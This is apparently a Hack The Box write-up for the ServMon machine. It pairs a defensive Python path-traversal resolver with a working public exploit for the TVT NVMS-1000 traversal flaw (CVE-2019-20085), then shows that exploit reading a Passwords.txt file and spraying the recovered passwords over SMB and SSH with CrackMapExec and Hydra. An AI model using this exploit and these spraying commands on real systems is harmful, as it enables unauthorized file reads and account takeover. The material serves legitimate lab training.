CVE-2019-20085


A vulnerability has been found in TVT NVMS-1000 (affected version unknown) and classified as critical. Affected by this vulnerability is an unknown code block of the component GET Request Handler. The manipulation with the input value /.. leads to a path traversal vulnerability. The CWE definition for the vulnerability is CWE-22. The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. As an impact it is known to affect confidentiality, integrity, and availability.
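As an added example (not code from the advisory, the vendor or the exploit on this page), the following Python shows the CWE-22 pattern the description refers to beside a resolver that neutralizes it: the request path is percent-decoded, joined under the web root, canonicalized, and only then checked for containment on the canonical path. It goes slightly beyond the advisory's `/..` case by also rejecting percent-encoded and backslash variants. The web root, the file names and the `naive_resolve`, `resolve_under_root`, `is_blocked` and `demo` functions are constructed for illustration; the traversal string is the one the public exploit on this page sends.

```python
import os
import tempfile
from pathlib import Path, PurePosixPath
from urllib.parse import unquote

# The traversal string used by the public exploit on this page, reused here
# as a test input (13 "../" segments followed by a target file).
TRAVERSAL = "../../../../../../../../../../../../../windows/win.ini"


class PathTraversalError(ValueError):
    """Raised when a requested path would resolve outside the web root."""


def naive_resolve(web_root, request_path: str) -> str:
    """The CWE-22 pattern: join external input onto the root and normalize.

    Nothing checks where the normalized path ends up, so every '..' walks up
    one level until the filesystem root absorbs the rest.
    """
    return os.path.normpath(os.path.join(str(web_root), request_path))


def resolve_under_root(web_root, request_path: str) -> Path:
    """Map a URL path onto the filesystem and refuse anything that escapes web_root."""
    root = Path(web_root).resolve()
    decoded = unquote(request_path)          # %2e%2e must be seen as ".."
    if "\\" in decoded or "\0" in decoded:   # Windows servers accept '\' as a separator
        raise PathTraversalError(f"invalid characters in {request_path!r}")
    rel = PurePosixPath(decoded)
    if rel.is_absolute():
        rel = rel.relative_to("/")
    # resolve() canonicalizes '..' and symlinks; the containment check is made
    # on that canonical form, never on the string the client sent.
    candidate = root.joinpath(*rel.parts).resolve()
    if candidate != root and root not in candidate.parents:
        raise PathTraversalError(f"{request_path!r} escapes {root}")
    return candidate


def is_blocked(web_root, request_path: str) -> bool:
    """True when the hardened resolver refuses the request."""
    try:
        resolve_under_root(web_root, request_path)
    except PathTraversalError:
        return True
    return False


def demo() -> dict:
    """Build a throwaway web root and exercise both resolvers against it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "webroot"
        (root / "css").mkdir(parents=True)
        (root / "css" / "app.css").write_text("body{}")
        served = resolve_under_root(root, "/css/app.css").read_text()
        return {
            "served": served,                                   # legitimate request still works
            "naive_target": naive_resolve(root, TRAVERSAL),     # where the unchecked join lands
            "traversal_blocked": is_blocked(root, TRAVERSAL),   # hardened resolver refuses it
        }


if __name__ == "__main__":
    print(demo())
```

The containment test compares `Path` objects after `resolve()`, not string prefixes, so a root of `/srv/nvms` does not accidentally accept `/srv/nvms-old/...`, and symlinks inside the root that point outside it are caught as well.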

Exploit


# Exploit Title: TVT NVMS 1000 - Directory Traversal 
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085
 
import sys
import requests
import time

if len(sys.argv) != 4:
    print("  ")
    print("Usage : python exploit.py url filename outputname")
    print("Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini")
    print("	")
else:
    # Thirteen "../" segments are prepended to the requested file name so the
    # GET handler resolves it from the filesystem root instead of the web root.
    traversal = "../../../../../../../../../../../..//"
    filename = sys.argv[2]
    url = sys.argv[1] + traversal + filename
    outputname = sys.argv[3]
    content = requests.get(url)

    if content.status_code == 200:
        print(" ")
        print("Directory Traversal Succeeded")
        time.sleep(3)
        print(" ")
        print("Saving Output")
        # Open for writing directly rather than shelling out to touch and reopening r+.
        with open(outputname, "w") as output_write:
            output_write.write(content.text)
    else:
        print("Host not vulnerable to Directory Traversal!")

The exploit was found using searchsploit.

Exploitation


Given that the note on the FTP server mentions a credential file on the Desktop of the Nathan user's directory, I can use this vulnerability to extract the Passwords.txt file.

This is done on the assumption that the FTP server is serving the C:\Users directory.

┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ python3 nvms1000_directory_traversal.py $IP Users/Nathan/Desktop/Passwords.txt passwords.txt 
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
 
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++  END  ++++++++++

Extracting C:/Users/Nathan/Desktop/Passwords.txt to passwords.txt: it appears to be a list of passwords.

Validation


SMB


┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ crackmapexec smb $IP -u users -p passwords.txt --continue-on-success
smb         10.10.10.184    445    servmon          [*] windows 10.0 build 17763 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
smb         10.10.10.184    445    servmon          [-] servmon\nathan:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\nathan:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\nathan:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\nathan:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\nathan:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\nathan:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\nathan:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [+] servmon\nadine:L1k3B1gBut7s@W0rk 
smb         10.10.10.184    445    servmon          [-] servmon\nadine:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\nadine:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\nadine:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\administrator:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\administrator:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\administrator:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\administrator:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\administrator:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\administrator:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE 
smb         10.10.10.184    445    servmon          [-] servmon\administrator:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE 

Running CrackMapExec against the SMB server for validation gave one hit: nadine:L1k3B1gBut7s@W0rk

On top of that, the output confirms the hostname: ServMon

SSH


┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ hydra -L users -P passwords.txt ssh://$IP
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 10:43:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21 login tries (l:3/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-30 10:43:58
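As an added example (not a tool from this page or its author), a small Python parser for the CrackMapExec SMB and Hydra SSH result lines shown in the two validation runs above. It pulls out which credential pairs validated and how many failed attempts each account absorbed, which is the figure a defender compares against an account-lockout threshold and what a tester records in the report. The sample lines, the host, the user names and the `guessN` passwords are constructed, not the lab's output; `parse_results` is the assumed helper name.

```python
import re
from collections import Counter

# Constructed sample in the line formats CrackMapExec (smb) and Hydra (ssh)
# print on this page; host, users and passwords are placeholders.
SAMPLE = """\
smb  192.0.2.10  445  HOST01  [*] Windows 10.0 Build 17763 x64 (name:HOST01) (domain:HOST01) (signing:False) (SMBv1:False)
smb  192.0.2.10  445  HOST01  [-] HOST01\\alice:guess1 STATUS_LOGON_FAILURE
smb  192.0.2.10  445  HOST01  [-] HOST01\\alice:guess2 STATUS_LOGON_FAILURE
smb  192.0.2.10  445  HOST01  [+] HOST01\\alice:guess3
smb  192.0.2.10  445  HOST01  [-] HOST01\\bob:guess1 STATUS_LOGON_FAILURE
smb  192.0.2.10  445  HOST01  [-] HOST01\\bob:guess2 STATUS_LOGON_FAILURE
smb  192.0.2.10  445  HOST01  [-] HOST01\\bob:guess3 STATUS_LOGON_FAILURE
[22][ssh] host: 192.0.2.10   login: Alice   password: guess3
1 of 1 target successfully completed, 1 valid password found
"""

# "smb <ip> <port> <host> [mark] <rest>"; the mark is [*] info, [+] success, [-] failure.
CME_LINE = re.compile(
    r"^smb\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[(?P<mark>[-+*!])\]\s+(?P<rest>.*?)\s*$"
)
# "<domain>\<user>:<password>" optionally followed by an NT status on failures.
CME_CRED = re.compile(
    r"^(?P<domain>[^\\]+)\\(?P<user>[^:]+):(?P<password>.*?)(?:\s+(?P<status>STATUS_[A-Z_]+))?$"
)
# "[<port>][<service>] host: <ip>   login: <user>   password: <password>"
HYDRA_LINE = re.compile(
    r"^\[(?P<port>\d+)\]\[(?P<service>\w+)\]\s+host:\s+(?P<ip>\S+)\s+login:\s+(?P<user>\S+)"
    r"\s+password:\s+(?P<password>.*?)\s*$"
)


def parse_results(text: str) -> dict:
    """Return the validated credentials and the failed-attempt count per account."""
    valid = []            # (service, ip, user, password) for every [+] / hydra hit
    failures = Counter()  # attempts that came back with a STATUS_* code, per user
    for line in text.splitlines():
        m = CME_LINE.match(line)
        if m:
            if m["mark"] not in ("+", "-"):
                continue  # [*] banner lines carry host info, not credentials
            c = CME_CRED.match(m["rest"])
            if not c:
                continue
            user = c["user"].lower()
            if m["mark"] == "+":
                valid.append(("smb", m["ip"], user, c["password"]))
            else:
                failures[user] += 1
            continue
        h = HYDRA_LINE.match(line)
        if h:
            valid.append((h["service"], h["ip"], h["user"].lower(), h["password"]))
    return {"valid": valid, "failed_attempts": dict(failures)}


if __name__ == "__main__":
    for entry in parse_results(SAMPLE)["valid"]:
        print(entry)
```

User names are lower-cased so the SMB and SSH hits for the same account line up, as they do on this page where CrackMapExec prints `nadine` and Hydra prints `Nadine`.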

The same credential works for SSH as well.